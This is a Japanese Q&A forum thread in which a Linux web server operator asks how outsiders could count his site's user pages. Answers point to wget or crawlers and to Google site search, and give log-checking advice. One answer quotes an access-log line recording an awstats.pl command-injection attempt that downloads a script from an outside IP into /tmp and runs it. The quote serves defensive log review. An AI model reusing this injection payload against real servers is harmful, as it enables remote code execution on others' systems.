人力検索はてな
モバイル版を表示しています。PC版はこちら
i-mobile

LinuxでWebサーバを運営しています。他人 というか中国人のブログで 自分のサーバのユーザページ数が公開されてるんですけど 簡単に外部から解析出来るんですか?それともユーザディレクトリにCGIを置かれた?CGIの場合解析阻止にはCGI実行できなくするしか方法はないでしょうか?

●質問者: yoshi5231
●カテゴリ:コンピュータ
✍キーワード:CGI Linux Web サーバ ディレクトリ
○ 状態 :終了
└ 回答数 : 2/2件

▽最新の回答へ

1 ● inosisibeyan
●90ポイント

http://www.geocities.jp/horiuchimasaru/wget.html

Wget$B$r;H$*$&E*%Z!<%8(B

自動巡回ソフトなどでも、同様のことが出来ます。

ページ数のみなら更に簡単だと思います。

心配でしたら、httpdのログを見直されてはどうでしょうか。

less /var/log/httpd/access_log.1 | grep wget

XXX.XXX.XXX.XXX - - [28/Jan/2006:21:36:06 +0900] ”GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1” 404 299 ”-” ”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)”


上の例は、どうやらアタックのようですが通っていないです。

もしCGIを置かれているならば、アタックと同じplファイルなどが見つかります。

#updatedb &

#locate awstats.pl

#

と言った手順で、例のようなファイルがあれば検出されるはずです。

◎質問者からの返答

なるほど 参考にします


2 ● hive7134
●30ポイント

http://www.google.com/search?num=50&hl=ja&lr=lang_ja&...

Google

サイト内にある、ネットに公開されているページ数は、このようにGoogleを利用するなどして取得できると思いますが、こういった状況とは異なるのでしょうか?

◎質問者からの返答

巡回ロボットが拾ってないHTMLは これで検出できないのでは?

関連質問


●質問をもっと探す●



0.人力検索はてなトップ
8.このページを友達に紹介
9.このページの先頭へ
対応機種一覧
お問い合わせ
ヘルプ/お知らせ
ログイン
無料ユーザー登録
はてなトップ